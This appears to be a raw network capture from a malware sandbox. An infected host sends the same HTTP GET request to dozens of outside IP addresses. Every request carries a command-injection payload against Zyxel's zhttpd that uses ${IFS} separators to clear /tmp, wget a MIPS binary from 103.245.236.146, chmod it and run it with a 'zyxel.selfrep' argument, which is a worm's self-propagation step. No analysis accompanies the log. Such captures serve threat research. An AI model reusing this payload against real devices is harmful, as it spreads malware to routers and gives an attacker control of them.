                                                        Jan 28, 2024 10:12:41.178170919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1511192.168.2.1450942138.184.151.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178205013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1512192.168.2.1433208116.169.247.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178246975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1513192.168.2.143584619.102.248.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178273916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1514192.168.2.14429165.158.162.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178325891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1515192.168.2.1433814114.200.3.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178353071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1516192.168.2.1452158204.62.107.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178390026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1517192.168.2.143431664.236.197.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178504944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1518192.168.2.1451236125.147.40.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178553104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1519192.168.2.144054893.79.113.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178581953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1520192.168.2.143383097.67.29.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178633928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1521192.168.2.1440754184.18.165.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178668976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1522192.168.2.1454616192.69.87.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178702116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1523192.168.2.1445240144.36.56.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178740978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1524192.168.2.1434330144.48.216.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178778887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1525192.168.2.1456032182.164.87.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178812027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1526192.168.2.1440354205.212.156.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178841114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1527192.168.2.144267239.29.130.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178873062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1528192.168.2.1451052213.68.233.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178905010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1529192.168.2.145069287.50.148.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178950071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1530192.168.2.144863412.49.104.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.178977013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1531192.168.2.1452952202.225.104.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179029942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1532192.168.2.1433332218.234.212.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179080009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1533192.168.2.143604077.54.165.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179112911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1534192.168.2.1449348220.146.101.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179155111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1535192.168.2.1457102197.187.92.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179192066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1536192.168.2.1457852194.155.83.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179217100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1537192.168.2.1436700105.141.187.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179250956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1538192.168.2.1456734167.87.4.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179310083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1539192.168.2.1444366173.23.190.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179336071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1540192.168.2.1438288208.71.150.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179364920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1541192.168.2.1449040103.164.249.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179399967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1542192.168.2.145243837.167.185.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179452896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1543192.168.2.1448368197.31.111.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179486990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1544192.168.2.1440692178.198.175.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179517984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1545192.168.2.145232412.88.99.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179544926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1546192.168.2.1436200114.112.162.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179575920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1547192.168.2.143885087.207.182.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179625034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1548192.168.2.1448972168.87.190.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179655075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1549192.168.2.1433346161.85.184.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179692984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1550192.168.2.1445206205.137.117.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179734945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1551192.168.2.144812465.80.42.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179766893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1552192.168.2.144875045.38.238.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179794073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1553192.168.2.1451586158.59.119.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179825068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1554192.168.2.1453264116.229.197.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179855108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1555192.168.2.1456326218.159.26.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179883957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1556192.168.2.14364304.161.152.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179922104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1557192.168.2.1449146104.191.172.80443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179949045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1558192.168.2.1436676202.58.136.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.179984093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1559192.168.2.1456448104.202.174.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180023909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1560192.168.2.1435266142.235.134.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180071115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1561192.168.2.14422582.146.134.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180102110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1562192.168.2.143493212.119.222.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180129051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1563192.168.2.145626698.113.58.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180192947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1564192.168.2.144141037.26.249.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180206060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1565192.168.2.143994088.204.177.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180233002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1566192.168.2.144817413.209.42.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180286884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1567192.168.2.144761066.180.186.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180310011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1568192.168.2.1454556109.228.169.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180351019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1569192.168.2.1451594124.7.53.139443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180388927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1570192.168.2.1434550132.95.216.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:41.180423975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1571192.168.2.1453474102.148.234.104443
                                                        TimestampBytes transferredDirectionData
